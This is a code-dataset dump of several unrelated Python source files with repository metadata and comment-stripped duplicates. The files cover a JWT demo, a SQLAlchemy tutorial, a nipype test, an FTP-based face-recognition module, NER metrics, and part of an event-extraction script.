"name": "Dan Moore",
"roles": ["RETRIEVE_TODOS"]
}
encoded = jwt.generate_jwt(payload, key, "RS256", datetime.timedelta(minutes=5))
print(encoded)
# Todo API
decoded = jwt.verify_jwt(encoded, key, ["RS256"])
print(decoded)
| 22.5 | 82 | 0.601709 | import datetime
import python_jwt as jwt
import jwcrypto.jwk as jwk
def run():
key = jwk.JWK.generate(kty='RSA', size=2048)
payload = { "iss": "fusionauth.io",
"aud": "238d4793-70de-4183-9707-48ed8ecd19d9",
"sub": "19016b73-3ffa-4b26-80d8-aa9287738677",
"name": "Dan Moore",
"roles": ["RETRIEVE_TODOS"]
}
encoded = jwt.generate_jwt(payload, key, "RS256", datetime.timedelta(minutes=5))
print(encoded)
decoded = jwt.verify_jwt(encoded, key, ["RS256"])
print(decoded)
| true | true |
f72eb0fe13ca1abff84f6656134223f774bee5b5 | 3,510 | py | Python | database/sqlalchemy_test.py | Christine002/CalculatorHW1 | 07539a137fa69134c71388e67a5e1c98e5951f33 | [
"MIT"
] | null | null | null | database/sqlalchemy_test.py | Christine002/CalculatorHW1 | 07539a137fa69134c71388e67a5e1c98e5951f33 | [
"MIT"
] | null | null | null | database/sqlalchemy_test.py | Christine002/CalculatorHW1 | 07539a137fa69134c71388e67a5e1c98e5951f33 | [
"MIT"
] | null | null | null | from sqlalchemy import Column, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from pprint import pprint
# Create an engine that stores data in the local directory's
# sqlalchemy_example.db file.
engine = create_engine('sqlite:////web/Sqlite-Data/example.db')
# this loads the sqlalchemy base class
Base = declarative_base()
# Setting up the classes that create the record objects and define the schema
class Person(Base):
__tablename__ = 'person'
# Here we define columns for the table person
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
name = Column(String(250), nullable=False)
class Address(Base):
__tablename__ = 'address'
# Here we define columns for the table address.
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
street_name = Column(String(250))
street_number = Column(String(250))
post_code = Column(String(250), nullable=False)
# creates the field to store the person id
person_id = Column(Integer, ForeignKey('person.id'))
# creates the relationship between the person and addresses. backref adds a property to the Person class to retrieve addresses
person = relationship("Person", backref="addresses")
# Create all tables in the engine. This is equivalent to "Create Table"
# statements in raw SQL.
Base.metadata.create_all(engine)
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# A DBSession() instance establishes all conversations with the database
# and represents a "staging zone" for all the objects loaded into the
# database session object. Any change made against the objects in the
# session won't be persisted into the database until you call
# session.commit(). If you're not happy about the changes, you can
# revert all of them back to the last commit by calling
# session.rollback()
session = DBSession()
# Insert a Person in the person table
new_person1 = Person(name='Keith')
session.add(new_person1)
new_person2 = Person(name='Joe')
session.add(new_person1)
new_person3 = Person(name='Steve')
session.add(new_person1)
session.commit()
# Insert an Address in the address table using a loop
addresses = [
Address(post_code='00001', person=new_person1),
Address(post_code='00002', person=new_person2),
Address(post_code='00003', person=new_person3),
]
# Loop through addresses and commit them to the database
for address in addresses:
session.add(address)
session.commit()
# joins Person on Address
all_people = session.query(Person).join(Address).all()
# Accessing a person with their address, You have to loop the addresses property and remember it was added by the
# backref on the addresses class
for person in all_people:
# use the __dict__ magic method to have the object print it's properties
pprint(person.__dict__)
for address in person.addresses:
pprint(address.__dict__)
# Retrieving the inverse of the relationship. Notice I reverse the Person and Address to load the Address table
all_addresses = session.query(Address).join(Person).all()
for address in all_addresses:
# showing how to use the print function with printing text and data at the same time easily
print(f'{address.person.name} has a postal code of {address.post_code}')
| 36.5625 | 131 | 0.759829 | from sqlalchemy import Column, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from pprint import pprint
# sqlalchemy_example.db file.
engine = create_engine('sqlite:////web/Sqlite-Data/example.db')
# this loads the sqlalchemy base class
Base = declarative_base()
# Setting up the classes that create the record objects and define the schema
class Person(Base):
__tablename__ = 'person'
# Here we define columns for the table person
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
name = Column(String(250), nullable=False)
class Address(Base):
__tablename__ = 'address'
# Here we define columns for the table address.
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
street_name = Column(String(250))
street_number = Column(String(250))
post_code = Column(String(250), nullable=False)
# creates the field to store the person id
person_id = Column(Integer, ForeignKey('person.id'))
# creates the relationship between the person and addresses. backref adds a property to the Person class to retrieve addresses
person = relationship("Person", backref="addresses")
# Create all tables in the engine. This is equivalent to "Create Table"
# statements in raw SQL.
Base.metadata.create_all(engine)
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# A DBSession() instance establishes all conversations with the database
# and represents a "staging zone" for all the objects loaded into the
# database session object. Any change made against the objects in the
# session won't be persisted into the database until you call
# revert all of them back to the last commit by calling
# session.rollback()
session = DBSession()
# Insert a Person in the person table
new_person1 = Person(name='Keith')
session.add(new_person1)
new_person2 = Person(name='Joe')
session.add(new_person1)
new_person3 = Person(name='Steve')
session.add(new_person1)
session.commit()
# Insert an Address in the address table using a loop
addresses = [
Address(post_code='00001', person=new_person1),
Address(post_code='00002', person=new_person2),
Address(post_code='00003', person=new_person3),
]
# Loop through addresses and commit them to the database
for address in addresses:
session.add(address)
session.commit()
# joins Person on Address
all_people = session.query(Person).join(Address).all()
# Accessing a person with their address, You have to loop the addresses property and remember it was added by the
# backref on the addresses class
for person in all_people:
# use the __dict__ magic method to have the object print it's properties
pprint(person.__dict__)
for address in person.addresses:
pprint(address.__dict__)
all_addresses = session.query(Address).join(Person).all()
for address in all_addresses:
print(f'{address.person.name} has a postal code of {address.post_code}')
| true | true |
f72eb2bdfe5df62c8e4ef216181ab120564060ca | 934 | py | Python | nipype/interfaces/tests/test_auto_DataGrabber.py | Conxz/nipype | 1281723ae56eacd103597ff4081a205583706e62 | [
"Apache-2.0"
] | null | null | null | nipype/interfaces/tests/test_auto_DataGrabber.py | Conxz/nipype | 1281723ae56eacd103597ff4081a205583706e62 | [
"Apache-2.0"
] | 2 | 2017-10-05T21:08:38.000Z | 2018-10-09T23:01:23.000Z | nipype/interfaces/tests/test_auto_DataGrabber.py | Conxz/nipype | 1281723ae56eacd103597ff4081a205583706e62 | [
"Apache-2.0"
] | 1 | 2016-10-11T19:18:53.000Z | 2016-10-11T19:18:53.000Z | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from ...testing import assert_equal
from ..io import DataGrabber
def test_DataGrabber_inputs():
input_map = dict(base_directory=dict(),
ignore_exception=dict(nohash=True,
usedefault=True,
),
raise_on_empty=dict(usedefault=True,
),
sort_filelist=dict(mandatory=True,
),
template=dict(mandatory=True,
),
template_args=dict(),
)
inputs = DataGrabber.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_DataGrabber_outputs():
output_map = dict()
outputs = DataGrabber.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(outputs.traits()[key], metakey), value
| 28.30303 | 78 | 0.679872 |
from ...testing import assert_equal
from ..io import DataGrabber
def test_DataGrabber_inputs():
input_map = dict(base_directory=dict(),
ignore_exception=dict(nohash=True,
usedefault=True,
),
raise_on_empty=dict(usedefault=True,
),
sort_filelist=dict(mandatory=True,
),
template=dict(mandatory=True,
),
template_args=dict(),
)
inputs = DataGrabber.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_DataGrabber_outputs():
output_map = dict()
outputs = DataGrabber.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
yield assert_equal, getattr(outputs.traits()[key], metakey), value
| true | true |
f72eb2f1472da936493f1cf75785a6413c1e7e61 | 7,405 | py | Python | examples/face_recogniser/content/processing.py | kjarczak/balticlsc_module | d104c66fbfeb2147e8a40a0fa5170326843854c5 | [
"MIT"
] | null | null | null | examples/face_recogniser/content/processing.py | kjarczak/balticlsc_module | d104c66fbfeb2147e8a40a0fa5170326843854c5 | [
"MIT"
] | null | null | null | examples/face_recogniser/content/processing.py | kjarczak/balticlsc_module | d104c66fbfeb2147e8a40a0fa5170326843854c5 | [
"MIT"
] | 1 | 2021-06-24T07:57:40.000Z | 2021-06-24T07:57:40.000Z | import os
from typing import List, Tuple, Dict
import face_recognition
from matplotlib import pyplot, patches
from PIL import Image
import numpy as np
from balticlsc.access.ftp import upload_file, get_connection
from balticlsc.configs.credential.ftp import FTPCredential
from balticlsc.scheme.api import init_baltic_api
from balticlsc.scheme.logger import logger
from balticlsc.scheme.pin import Pin, MissingPin, PinAttribute, ValuesAttribute
from balticlsc.scheme.processing import ProcessingInterface
from balticlsc.scheme.utils import camel_to_snake, get_random_output_folder
# Version tag for this module build; logged at the start of Processing.process()
# so runtime logs identify which build handled a given job.
MODULE_VERSION = 'latest'
class Processing(ProcessingInterface):
def process(self, msg_uid: str, input_pin: Pin, output_pin_name_to_value: Dict[str, Pin]) -> None:
logger.info('module version = ' + MODULE_VERSION)
logger.info('starting processing for input pin="' + str(input_pin) + '"')
input_access_credential = input_pin.getattr(PinAttribute.ACCESS_CREDENTIAL)
input_folder = input_pin.getattr(PinAttribute.ACCESS_PATH)
if input_access_credential is None:
raise ValueError(f'missing access credential in the input pin={str(input_pin)}')
if input_folder is None:
raise ValueError(f'missing access path in the input pin={str(input_pin)}')
input_ftp_credential = FTPCredential(**input_access_credential)
# START # Establish the output access credential and folder # START #
output_pin_name: str = 'Output'
if output_pin_name not in output_pin_name_to_value:
error_msg = 'missing pin with name="' + output_pin_name + '" in output pins config'
logger.error(error_msg)
raise MissingPin([pin for pin in output_pin_name_to_value.values()], error_msg)
output_pin = output_pin_name_to_value[output_pin_name]
logger.info('loading output pin=' + str(output_pin))
output_access_credential = output_pin.getattr(PinAttribute.ACCESS_CREDENTIAL)
if output_access_credential is None:
logger.info('output pin access credentials is None, using input access credentials')
output_ftp_credential = input_ftp_credential
else:
output_access_credential = {camel_to_snake(key): value for key, value in output_access_credential.items()}
if str(output_access_credential) == str(input_access_credential):
logger.info('input and output access credential are the same')
output_ftp_credential = input_ftp_credential
else:
output_ftp_credential = FTPCredential(**output_access_credential)
output_access_path = output_pin.getattr(PinAttribute.ACCESS_PATH)
if output_access_path is None:
logger.info('access path is not provided in output config')
logger.info('setting random generated string as output folder name')
output_folder = get_random_output_folder(input_folder)
else:
output_access_path = {camel_to_snake(key): value for key, value in output_access_path.items()}
if 'resource_path' not in output_access_path:
logger.info('missing "resource_path" value in output access path')
logger.info('setting random generated string as output folder name')
output_folder = get_random_output_folder(input_folder)
else:
output_folder = output_access_path['resource_path']
logger.info('setting output folder based on output pin config "resource_path"=' + output_folder)
# STOP # Establish output credentials and folder # STOP #
logger.info('connecting to input ftp server: ' + input_ftp_credential.host)
input_ftp = get_connection(input_ftp_credential)
if output_ftp_credential != input_ftp_credential:
logger.info('connecting to output ftp server: ' + output_ftp_credential.host)
output_ftp = get_connection(output_ftp_credential)
else:
logger.info('using the same connection as output ftp')
output_ftp = input_ftp
# START # process and send files # START #
logger.info('changing ftp working directory to "' + input_folder + '"')
input_ftp.cwd(input_folder)
logger.info('working directory changed')
logger.info('listing files in the working directory ...')
filenames: List[str] = input_ftp.nlst()
logger.info('handling ' + str(len(filenames)) + ' files')
os.makedirs('tmp', exist_ok=True)
for filename in filenames:
if not filename.lower().endswith(('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif')):
logger.warning('wrong format of the file "' + filename + '", omitting')
continue
logger.info('downloading file "' + filename + '"')
filepath = 'tmp/' + filename
# Save the image locally
with open(filepath, 'wb') as file:
input_ftp.retrbinary("RETR " + filename, file.write)
# Mark faces and save the image
image = np.array(Image.open(filepath))
im = Image.fromarray(image)
im.save(filepath)
height: int = image.shape[0]
width: int = image.shape[1]
dpi: int = 100
faces_coords: List[Tuple[int]] = face_recognition.face_locations(image)
figure = pyplot.figure(frameon=False, dpi=dpi)
figure.set_size_inches(width / dpi, height / dpi)
ax = pyplot.Axes(figure, [0., 0., 1., 1.])
ax.set_axis_off()
figure.add_axes(ax)
ax.imshow(image)
logger.info('adding ' + str(len(faces_coords)) + ' faces to image "' + filename + '"')
fig = pyplot.gcf()
fig.savefig(fname=filepath, dpi=dpi, bbox_inches='tight')
for index in range(len(faces_coords)):
x_start = faces_coords[index][3]
y_start = faces_coords[index][0]
x_width = (faces_coords[index][1] - faces_coords[index][3])
y_height = (faces_coords[index][2] - faces_coords[index][0])
rect = patches.Rectangle((x_start, y_start), x_width, y_height,
edgecolor='r', facecolor="none")
ax.add_patch(rect)
pyplot.savefig(fname=filepath, dpi=dpi, bbox_inches='tight')
pyplot.close()
# Send file to ftp
with open(filepath, 'rb') as file:
logger.info('uploading file "' + filename + '" into ' + output_folder)
upload_file(filename, output_folder, output_ftp, file)
file.close() # close file and FTP
input_ftp.cwd(input_folder)
# STOP # process and send files # STOP #
input_ftp.quit()
if output_ftp_credential != input_ftp_credential:
output_ftp.quit()
rest_client.send_output_token(
base_msg_uid=msg_uid,
values={
ValuesAttribute.RESOURCE_PATH: output_folder
},
output_pin_name=output_pin.getattr(PinAttribute.NAME))
rest_client.send_ack_token(
msg_uids=[msg_uid],
is_final=True,
is_failed=False,
)
app, rest_client = init_baltic_api(Processing)
| 45.709877 | 118 | 0.640648 | import os
from typing import List, Tuple, Dict
import face_recognition
from matplotlib import pyplot, patches
from PIL import Image
import numpy as np
from balticlsc.access.ftp import upload_file, get_connection
from balticlsc.configs.credential.ftp import FTPCredential
from balticlsc.scheme.api import init_baltic_api
from balticlsc.scheme.logger import logger
from balticlsc.scheme.pin import Pin, MissingPin, PinAttribute, ValuesAttribute
from balticlsc.scheme.processing import ProcessingInterface
from balticlsc.scheme.utils import camel_to_snake, get_random_output_folder
MODULE_VERSION = 'latest'
class Processing(ProcessingInterface):
def process(self, msg_uid: str, input_pin: Pin, output_pin_name_to_value: Dict[str, Pin]) -> None:
logger.info('module version = ' + MODULE_VERSION)
logger.info('starting processing for input pin="' + str(input_pin) + '"')
input_access_credential = input_pin.getattr(PinAttribute.ACCESS_CREDENTIAL)
input_folder = input_pin.getattr(PinAttribute.ACCESS_PATH)
if input_access_credential is None:
raise ValueError(f'missing access credential in the input pin={str(input_pin)}')
if input_folder is None:
raise ValueError(f'missing access path in the input pin={str(input_pin)}')
input_ftp_credential = FTPCredential(**input_access_credential)
t in output_pin_name_to_value:
error_msg = 'missing pin with name="' + output_pin_name + '" in output pins config'
logger.error(error_msg)
raise MissingPin([pin for pin in output_pin_name_to_value.values()], error_msg)
output_pin = output_pin_name_to_value[output_pin_name]
logger.info('loading output pin=' + str(output_pin))
output_access_credential = output_pin.getattr(PinAttribute.ACCESS_CREDENTIAL)
if output_access_credential is None:
logger.info('output pin access credentials is None, using input access credentials')
output_ftp_credential = input_ftp_credential
else:
output_access_credential = {camel_to_snake(key): value for key, value in output_access_credential.items()}
if str(output_access_credential) == str(input_access_credential):
logger.info('input and output access credential are the same')
output_ftp_credential = input_ftp_credential
else:
output_ftp_credential = FTPCredential(**output_access_credential)
output_access_path = output_pin.getattr(PinAttribute.ACCESS_PATH)
if output_access_path is None:
logger.info('access path is not provided in output config')
logger.info('setting random generated string as output folder name')
output_folder = get_random_output_folder(input_folder)
else:
output_access_path = {camel_to_snake(key): value for key, value in output_access_path.items()}
if 'resource_path' not in output_access_path:
logger.info('missing "resource_path" value in output access path')
logger.info('setting random generated string as output folder name')
output_folder = get_random_output_folder(input_folder)
else:
output_folder = output_access_path['resource_path']
logger.info('setting output folder based on output pin config "resource_path"=' + output_folder)
nput_ftp_credential.host)
input_ftp = get_connection(input_ftp_credential)
if output_ftp_credential != input_ftp_credential:
logger.info('connecting to output ftp server: ' + output_ftp_credential.host)
output_ftp = get_connection(output_ftp_credential)
else:
logger.info('using the same connection as output ftp')
output_ftp = input_ftp
irectory to "' + input_folder + '"')
input_ftp.cwd(input_folder)
logger.info('working directory changed')
logger.info('listing files in the working directory ...')
filenames: List[str] = input_ftp.nlst()
logger.info('handling ' + str(len(filenames)) + ' files')
os.makedirs('tmp', exist_ok=True)
for filename in filenames:
if not filename.lower().endswith(('.png', '.jpg', '.jpeg', '.tiff', '.bmp', '.gif')):
logger.warning('wrong format of the file "' + filename + '", omitting')
continue
logger.info('downloading file "' + filename + '"')
filepath = 'tmp/' + filename
with open(filepath, 'wb') as file:
input_ftp.retrbinary("RETR " + filename, file.write)
image = np.array(Image.open(filepath))
im = Image.fromarray(image)
im.save(filepath)
height: int = image.shape[0]
width: int = image.shape[1]
dpi: int = 100
faces_coords: List[Tuple[int]] = face_recognition.face_locations(image)
figure = pyplot.figure(frameon=False, dpi=dpi)
figure.set_size_inches(width / dpi, height / dpi)
ax = pyplot.Axes(figure, [0., 0., 1., 1.])
ax.set_axis_off()
figure.add_axes(ax)
ax.imshow(image)
logger.info('adding ' + str(len(faces_coords)) + ' faces to image "' + filename + '"')
fig = pyplot.gcf()
fig.savefig(fname=filepath, dpi=dpi, bbox_inches='tight')
for index in range(len(faces_coords)):
x_start = faces_coords[index][3]
y_start = faces_coords[index][0]
x_width = (faces_coords[index][1] - faces_coords[index][3])
y_height = (faces_coords[index][2] - faces_coords[index][0])
rect = patches.Rectangle((x_start, y_start), x_width, y_height,
edgecolor='r', facecolor="none")
ax.add_patch(rect)
pyplot.savefig(fname=filepath, dpi=dpi, bbox_inches='tight')
pyplot.close()
with open(filepath, 'rb') as file:
logger.info('uploading file "' + filename + '" into ' + output_folder)
upload_file(filename, output_folder, output_ftp, file)
file.close()
input_ftp.cwd(input_folder)
ut_ftp_credential != input_ftp_credential:
output_ftp.quit()
rest_client.send_output_token(
base_msg_uid=msg_uid,
values={
ValuesAttribute.RESOURCE_PATH: output_folder
},
output_pin_name=output_pin.getattr(PinAttribute.NAME))
rest_client.send_ack_token(
msg_uids=[msg_uid],
is_final=True,
is_failed=False,
)
app, rest_client = init_baltic_api(Processing)
| true | true |
f72eb3531991a856678c5e8125ca3770d94382aa | 6,355 | py | Python | UNF/training/metric.py | waterzxj/UNF | 5eda8e7c60116735f595f4b21b24547708b36cf5 | [
"Apache-2.0"
] | 86 | 2020-02-23T13:38:11.000Z | 2022-03-01T12:09:28.000Z | UNF/training/metric.py | Dreamliking/UNF | 5eda8e7c60116735f595f4b21b24547708b36cf5 | [
"Apache-2.0"
] | 2 | 2020-04-20T08:33:05.000Z | 2020-05-13T13:43:08.000Z | UNF/training/metric.py | Dreamliking/UNF | 5eda8e7c60116735f595f4b21b24547708b36cf5 | [
"Apache-2.0"
] | 14 | 2020-03-07T05:21:44.000Z | 2021-05-09T16:57:23.000Z | #coding:utf-8
import torch
from learner_util import get_ner_BIO
class Metric(object):
def __call__(self,
predictions,
gold_labels,
mask=None):
"""
metric的抽象类
:params predictions 预测结果的tensor
:params gold_labels 实际结果的tensor
:mask mask
"""
raise NotImplementedError
def get_metric(self, reset=False):
"""
返回metric的指标
"""
raise NotImplementedError
def reset(self):
"""
重置内部状态
"""
raise NotImplementedError
@staticmethod
def unwrap_to_tensors(*tensors):
"""
把tensor安全的copy到cpu进行操作,避免gpu的oom
"""
return (x.detach().cpu() if isinstance(x, torch.Tensor) else x for x in tensors)
@classmethod
def from_option(cls, conf):
return cls(**conf)
class F1Measure(Metric):
def __init__(self, positive_label):
"""
准确率、召回率、F值的评价指标
"""
super(F1Measure, self).__init__()
self._positive_label = positive_label
self._true_positives = 0.0
self._true_negatives = 0.0
self._false_positives = 0.0
self._false_negatives = 0.0
def __call__(self,
predictions,
gold_labels,
mask=None):
predictions, gold_labels, mask = self.unwrap_to_tensors(predictions, gold_labels, mask)
num_classes = predictions.size(-1)
if (gold_labels >= num_classes).any():
raise Exception("A gold label passed to F1Measure contains an id >= {}, "
"the number of classes.".format(num_classes))
if mask is None:
mask = torch.ones_like(gold_labels)
mask = mask.float()
gold_labels = gold_labels.float()
self.update(predictions, gold_labels, mask)
def update(self, predictions, gold_labels, mask):
positive_label_mask = gold_labels.eq(self._positive_label).float()
negative_label_mask = 1.0 - positive_label_mask
argmax_predictions = predictions.max(-1)[1].float().squeeze(-1)
# True Negatives: correct non-positive predictions.
correct_null_predictions = (argmax_predictions !=
self._positive_label).float() * negative_label_mask
self._true_negatives += (correct_null_predictions.float() * mask).sum()
# True Positives: correct positively labeled predictions.
correct_non_null_predictions = (argmax_predictions ==
self._positive_label).float() * positive_label_mask
self._true_positives += (correct_non_null_predictions * mask).sum()
# False Negatives: incorrect negatively labeled predictions.
incorrect_null_predictions = (argmax_predictions !=
self._positive_label).float() * positive_label_mask
self._false_negatives += (incorrect_null_predictions * mask).sum()
# False Positives: incorrect positively labeled predictions
incorrect_non_null_predictions = (argmax_predictions ==
self._positive_label).float() * negative_label_mask
self._false_positives += (incorrect_non_null_predictions * mask).sum()
def get_metric(self, reset=False):
"""
返回准确率、召回率、F值评价指标
"""
# print('TP',self._true_positives,'TN',self._true_negatives,'FP',self._false_positives,'FN',self._false_negatives)
precision = float(self._true_positives) / float(self._true_positives + self._false_positives + 1e-13)
recall = float(self._true_positives) / float(self._true_positives + self._false_negatives + 1e-13)
f1_measure = 2. * ((precision * recall) / (precision + recall + 1e-13))
if reset:
self.reset()
return {"precision":precision, "recall": recall, "f1_measure":f1_measure}
def reset(self):
self._true_positives = 0.0
self._true_negatives = 0.0
self._false_positives = 0.0
self._false_negatives = 0.0
class NerF1Measure(Metric):
def __init__(self, label_vocab):
self.golden_num = 0.0
self.predict_num = 0.0
self.right_num = 0.0
self.label_vocab = label_vocab
def reset(self):
"""
重置内部状态
"""
self.golden_num = 0.0
self.predict_num = 0.0
self.right_num = 0.0
def get_metric(self, reset=False):
"""
返回metric的指标
"""
if self.predict_num == 0.0:
precision = -1
else:
precision = (self.right_num+0.0)/self.predict_num
if self.golden_num == 0.0:
recall = -1
else:
recall = (self.right_num+0.0)/self.golden_num
if (precision == -1) or (recall == -1) or (precision+recall) <= 0.:
f_measure = -1
else:
f_measure = 2*precision*recall/(precision+recall)
if reset:
self.reset()
return {"precision":precision, "recall": recall, "f1_measure":f_measure}
def update(self, gold_matrix, pred_matrix):
right_ner = list(set(gold_matrix).intersection(set(pred_matrix)))
self.golden_num += len(gold_matrix)
self.predict_num += len(pred_matrix)
self.right_num += len(right_ner)
def __call__(self,
predictions,
gold_labels,
mask=None):
"""
metric的抽象类
:params predictions 预测结果的tensor
:params gold_labels 实际结果的tensor
:mask mask
"""
batch_size = gold_labels.size(0)
seq_len = gold_labels.size(1)
predictions, gold_labels, mask = self.unwrap_to_tensors(predictions, gold_labels,
mask)
predictions = predictions.tolist()
gold_labels = gold_labels.tolist()
mask = mask.tolist()
for idx in range(batch_size):
pred = [self.label_vocab[predictions[idx][idy]] for idy in range(seq_len) if mask[idx][idy] != 0]
gold = [self.label_vocab[gold_labels[idx][idy]] for idy in range(seq_len) if mask[idx][idy] != 0]
gold_matrix = get_ner_BIO(gold)
pred_matrix = get_ner_BIO(pred)
self.update(gold_matrix, pred_matrix)
| 32.09596 | 122 | 0.59465 |
import torch
from learner_util import get_ner_BIO
class Metric(object):
def __call__(self,
predictions,
gold_labels,
mask=None):
raise NotImplementedError
def get_metric(self, reset=False):
raise NotImplementedError
def reset(self):
raise NotImplementedError
@staticmethod
def unwrap_to_tensors(*tensors):
return (x.detach().cpu() if isinstance(x, torch.Tensor) else x for x in tensors)
@classmethod
def from_option(cls, conf):
return cls(**conf)
class F1Measure(Metric):
def __init__(self, positive_label):
super(F1Measure, self).__init__()
self._positive_label = positive_label
self._true_positives = 0.0
self._true_negatives = 0.0
self._false_positives = 0.0
self._false_negatives = 0.0
def __call__(self,
predictions,
gold_labels,
mask=None):
predictions, gold_labels, mask = self.unwrap_to_tensors(predictions, gold_labels, mask)
num_classes = predictions.size(-1)
if (gold_labels >= num_classes).any():
raise Exception("A gold label passed to F1Measure contains an id >= {}, "
"the number of classes.".format(num_classes))
if mask is None:
mask = torch.ones_like(gold_labels)
mask = mask.float()
gold_labels = gold_labels.float()
self.update(predictions, gold_labels, mask)
def update(self, predictions, gold_labels, mask):
positive_label_mask = gold_labels.eq(self._positive_label).float()
negative_label_mask = 1.0 - positive_label_mask
argmax_predictions = predictions.max(-1)[1].float().squeeze(-1)
correct_null_predictions = (argmax_predictions !=
self._positive_label).float() * negative_label_mask
self._true_negatives += (correct_null_predictions.float() * mask).sum()
correct_non_null_predictions = (argmax_predictions ==
self._positive_label).float() * positive_label_mask
self._true_positives += (correct_non_null_predictions * mask).sum()
incorrect_null_predictions = (argmax_predictions !=
self._positive_label).float() * positive_label_mask
self._false_negatives += (incorrect_null_predictions * mask).sum()
incorrect_non_null_predictions = (argmax_predictions ==
self._positive_label).float() * negative_label_mask
self._false_positives += (incorrect_non_null_predictions * mask).sum()
def get_metric(self, reset=False):
precision = float(self._true_positives) / float(self._true_positives + self._false_positives + 1e-13)
recall = float(self._true_positives) / float(self._true_positives + self._false_negatives + 1e-13)
f1_measure = 2. * ((precision * recall) / (precision + recall + 1e-13))
if reset:
self.reset()
return {"precision":precision, "recall": recall, "f1_measure":f1_measure}
def reset(self):
self._true_positives = 0.0
self._true_negatives = 0.0
self._false_positives = 0.0
self._false_negatives = 0.0
class NerF1Measure(Metric):
def __init__(self, label_vocab):
self.golden_num = 0.0
self.predict_num = 0.0
self.right_num = 0.0
self.label_vocab = label_vocab
def reset(self):
self.golden_num = 0.0
self.predict_num = 0.0
self.right_num = 0.0
def get_metric(self, reset=False):
if self.predict_num == 0.0:
precision = -1
else:
precision = (self.right_num+0.0)/self.predict_num
if self.golden_num == 0.0:
recall = -1
else:
recall = (self.right_num+0.0)/self.golden_num
if (precision == -1) or (recall == -1) or (precision+recall) <= 0.:
f_measure = -1
else:
f_measure = 2*precision*recall/(precision+recall)
if reset:
self.reset()
return {"precision":precision, "recall": recall, "f1_measure":f_measure}
def update(self, gold_matrix, pred_matrix):
right_ner = list(set(gold_matrix).intersection(set(pred_matrix)))
self.golden_num += len(gold_matrix)
self.predict_num += len(pred_matrix)
self.right_num += len(right_ner)
def __call__(self,
predictions,
gold_labels,
mask=None):
batch_size = gold_labels.size(0)
seq_len = gold_labels.size(1)
predictions, gold_labels, mask = self.unwrap_to_tensors(predictions, gold_labels,
mask)
predictions = predictions.tolist()
gold_labels = gold_labels.tolist()
mask = mask.tolist()
for idx in range(batch_size):
pred = [self.label_vocab[predictions[idx][idy]] for idy in range(seq_len) if mask[idx][idy] != 0]
gold = [self.label_vocab[gold_labels[idx][idy]] for idy in range(seq_len) if mask[idx][idy] != 0]
gold_matrix = get_ner_BIO(gold)
pred_matrix = get_ner_BIO(pred)
self.update(gold_matrix, pred_matrix)
| true | true |
f72eb416f3eae037abbad9c26911354d1395878a | 235 | py | Python | CA117/Lab_4/beststudent_31_v1.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 6 | 2016-02-04T00:15:20.000Z | 2019-10-13T13:53:16.000Z | CA117/Lab_4/beststudent_31_v1.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 2 | 2016-03-14T04:01:36.000Z | 2019-10-16T12:45:34.000Z | CA117/Lab_4/beststudent_31_v1.py | PRITI1999/OneLineWonders | 91a7368e0796e5a3b5839c9165f9fbe5460879f5 | [
"MIT"
] | 10 | 2016-02-09T14:38:32.000Z | 2021-05-25T08:16:26.000Z | (lambda a:print("Best student: {1} {2}\nBest mark: {0}".format(*max([line.split()for line in open(a,'r')],key=lambda x:int(x[0]))))if __import__('os').path.isfile(a)else print("ERROR: File not found! " + a))(__import__('sys').argv[1])
| 117.5 | 234 | 0.651064 | (lambda a:print("Best student: {1} {2}\nBest mark: {0}".format(*max([line.split()for line in open(a,'r')],key=lambda x:int(x[0]))))if __import__('os').path.isfile(a)else print("ERROR: File not found! " + a))(__import__('sys').argv[1])
| true | true |
f72eb438d3abf9cfce6d1a6d2c601b7b771936ca | 3,568 | py | Python | multi_layer_network/src/extract_events.py | hxin18/gaia-entity-resolution | 4f64a0e07ff6aa62ea6f30ce86c6106a7201aaa0 | [
"MIT"
] | null | null | null | multi_layer_network/src/extract_events.py | hxin18/gaia-entity-resolution | 4f64a0e07ff6aa62ea6f30ce86c6106a7201aaa0 | [
"MIT"
] | null | null | null | multi_layer_network/src/extract_events.py | hxin18/gaia-entity-resolution | 4f64a0e07ff6aa62ea6f30ce86c6106a7201aaa0 | [
"MIT"
] | null | null | null | import re
import sys
import json
import getopt
import collections
from datetime import datetime
from collections import defaultdict
### Given RPI ColdStart input, the Entity strings JSON file, and the String strings JSON file, produces the events JSON file. ###
def main(argv):
opts, _ = getopt.getopt(argv,"hi:e:s:o:",["ifile=","efile=","sfile=","ofile="])
for opt, arg in opts:
if opt == '-h':
print('Given RPI ColdStart input, the Entity strings JSON file, and the String strings JSON file, produces the events JSON file, usage: python extract_events.py -i <inputfile> -e <entitystringsfile> -s <stringstringsfile> -o <outputfile>')
sys.exit()
elif opt in ("-i", "--ifile"):
inputfile = arg
elif opt in ("-e", "--efile"):
entity_strings = arg
elif opt in ("-s", "--sfile"):
string_strings = arg
elif opt in ("-o", "--ofile"):
outputfile = arg
extract_events(inputfile, outputfile, entity_strings, string_strings)
def extract_events(path_to_KB_file, path_to_output, path_to_entity_strings, path_to_string_strings):
entity_strings = json.load(open(path_to_entity_strings))
string_strings = json.load(open(path_to_string_strings))
# entity_type_to_dict_key = {'PER': 'PER_entities'} --> I didn't use this.
